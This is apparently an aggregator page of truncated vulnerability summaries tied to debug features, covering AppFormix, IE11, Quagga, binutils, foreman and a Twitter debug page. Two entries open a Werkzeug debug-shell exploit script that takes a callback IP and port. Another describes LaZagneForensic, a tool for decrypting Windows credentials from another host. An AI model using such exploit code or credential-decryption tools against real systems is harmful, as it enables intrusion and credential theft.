CVE-2018-0015

CVE-2018-0015 affects Juniper AppFormix: the AppFormix Agent exposes a Python debug console on the host where the agent runs, allowing a user with unrestricted access to execute commands with root privileges. Affected releases include all versions up to 2.7.3, and 2.11 before 2.11.3, and 2.15 bef...

Microsoft IE11 Js::RegexHelper::RegexReplace Use-After-Free

IE11: Use-after-free in Js::RegexHelper::RegexReplace CVE-2018-0866 There is a Use-after-free vulnerability in Internet Explorer that could potentially be used for memory disclosure. This was tested on IE11 running on Window 7 64-bit with the latest patches applied. Note that the PoC was tested i...

katello-debug: Possible symlink attacks due to use of predictable file names

A flaw was found in katello-debug where certain scripts and log files used insecure temporary files. A local user could exploit this flaw to conduct a symbolic-link attack, allowing them to overwrite the contents of arbitrary files...

foreman-debug: missing obfuscation of sensitive information

A flaw was found in foreman-debug's logging. An attacker with access to the foreman log file would be able to view passwords, allowing them to access those systems...

foreman: inside discovery-debug, the root password is displayed in plaintext

A flaw was found in discovery-debug in foreman. An attacker, with permissions to view the debug results, would be able to view the root password associated with that system, potentially allowing them to access it...

CVE-2018-5380

The Quagga BGP daemon bgpd prior to version 1.2.3 can overrun internal BGP code-to-string conversion tables used for debug by 1 pointer value, based on input...

UBUNTU-CVE-2018-5380

The Quagga BGP daemon bgpd prior to version 1.2.3 can overrun internal BGP code-to-string conversion tables used for debug by 1 pointer value, based on input...

CVE-2018-5380

The Quagga BGP daemon bgpd prior to version 1.2.3 can overrun internal BGP code-to-string conversion tables used for debug by 1 pointer value, based on input...

Information disclosure

In XBLRamDump mode, there is a debug feature that can be used to dump memory contents, if an attacker has physical access to the device. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Androi...

GNU Binutils 'bfd_get_debug_link_info_1' Function Denial of Service Vulnerability

GNU Binutils a.k.a. GNU Binary Utilities or binutils is a set of programming language utilities developed by the GNU Project to work with object files in a variety of formats, with connectors, assemblers, and other tools for object files and archives.The Binary File Descriptor BFD library a.k.a...

ALPINE-CVE-2018-6759

The bfdgetdebuglinkinfo1 function in opncls.c in the Binary File Descriptor BFD library aka libbfd, as distributed in GNU Binutils 2.30, has an unchecked strnlen operation. Remote attackers could leverage this vulnerability to cause a denial of service segmentation fault via a crafted ELF file...

LaZagneForensic - Decrypt Windows Credentials From Another Host

LaZagne uses an internal Windows API called CryptUnprotectData to decrypt user passwords. This API should be called on the victim user session, otherwise, it does not work. If the computer has not been started when the analysis is realized on an offline mounted disk, or if we do not want to drop ...

UBUNTU-CVE-2018-6543

In GNU Binutils 2.30, there's an integer overflow in the function loadspecificdebugsection in objdump.c, which results in malloc with 0 size. A crafted ELF file allows remote attackers to cause a denial of service application crash or possibly have unspecified other impact...

ALPINE-CVE-2018-6543

In GNU Binutils 2.30, there's an integer overflow in the function loadspecificdebugsection in objdump.c, which results in malloc with 0 size. A crafted ELF file allows remote attackers to cause a denial of service application crash or possibly have unspecified other impact...

DEBIAN-CVE-2018-6543

In GNU Binutils 2.30, there's an integer overflow in the function loadspecificdebugsection in objdump.c, which results in malloc with 0 size. A crafted ELF file allows remote attackers to cause a denial of service application crash or possibly have unspecified other impact...

X (Formerly Twitter): ms5 debug page exposing internal info (internal IPs, headers)

Summary: Information exposure through /debug in ms5.twitter.com Description: Debug page from ms5.twitter.com exposes internal info, such as internal IPs and headers. Steps To Reproduce: 1. Visit ms5.twitter.com/debug 1. See internal IP and header-names used 1. To gather more internal IPs, just...

CentOS 6 : kernel (CESA-2018:0169)

The remote CentOS host is missing a security update. C Tenable Network Security, Inc. The package checks in this plugin were extracted from CentOS Errata and Security Advisory 2018:0169. include"compat.inc"; if description scriptid106535; scriptversion"3.3"; scriptcvsdate"Date: 2019/10/02...

Werkzeug - 'Debug Shell' Command Execution

!/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' % sys.argv1,sys.argv2 if "Werkzeug " not in...

Werkzeug - Debug Shell Command Execution

Werkzeug - Debug Shell Command Execution !/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' %...

Cross site scripting

In Yii Framework 2.x before 2.0.14, remote attackers could obtain potentially sensitive information from exception messages, or exploit reflected XSS on the error handler page in non-debug mode. Related to base/ErrorHandler.php, log/Dispatcher.php, and views/errorHandler/exception.php...